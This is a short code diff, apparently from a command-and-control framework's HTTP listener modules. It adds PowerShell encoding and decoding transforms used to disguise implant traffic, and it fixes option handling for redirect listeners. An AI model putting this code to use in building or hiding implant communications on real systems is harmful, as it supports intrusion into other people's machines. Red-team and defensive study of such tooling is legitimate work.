312 self.generate_powershell = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_++){([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -shr 4)+65;([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -band 15)+65;}));" % {"var":var}
313 self.generate_powershell_r = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_+=2){(([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_]-65) -shl 4) -bor (([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_+1]-65) -band 15);}));" % {"var":var}
319 def netbiosu_powershell(var):
320 return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i++){($data2[$i] -shr 4)+65;($data2[$i] -band 15)+65;}));" % {"var":var}
321
322 def netbiosu_powershell_r(var):
323 return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i+=2){($data2[$i]-65 -shl 4) -bor ($data2[$i+1]-65 -band 15);}));" % {"var":var}
314324
315325 def _prepend(self, string):
316326 """Configure the `prepend` Transform, which prepends a static string to an arbitrary input.
+3
-3
lib/listeners/http_hop.py less more
485485
486486 if redirectListenerOptions:
487487
488 self.options['RedirectStagingKey']['Value'] = redirectListenerOptions['StagingKey']['Value']
489 self.options['DefaultProfile']['Value'] = redirectListenerOptions['DefaultProfile']['Value']
490 redirectHost = redirectListenerOptions['Host']['Value']
488 self.options['RedirectStagingKey']['Value'] = redirectListenerOptions.options['StagingKey']['Value']
489 self.options['DefaultProfile']['Value'] = redirectListenerOptions.options['DefaultProfile']['Value']
490 redirectHost = redirectListenerOptions.options['Host']['Value']
491491
492492 uris = [a for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
493493
+1
-1
lib/listeners/http_malleable.py less more
886886 getTask += "$data = [System.Text.Encoding]::Default.GetString($data);"
887887
888888 # ==== INTERPRET RESULTS ====
889 getTask += profile.get.server.output.generate_powershell_r("$data");
889 getTask += profile.get.server.output.generate_powershell_r("$data")
890890 getTask += "$data = [System.Text.Encoding]::Default.GetBytes($data);"
891891
892892 # ==== RETURN RESULTS ====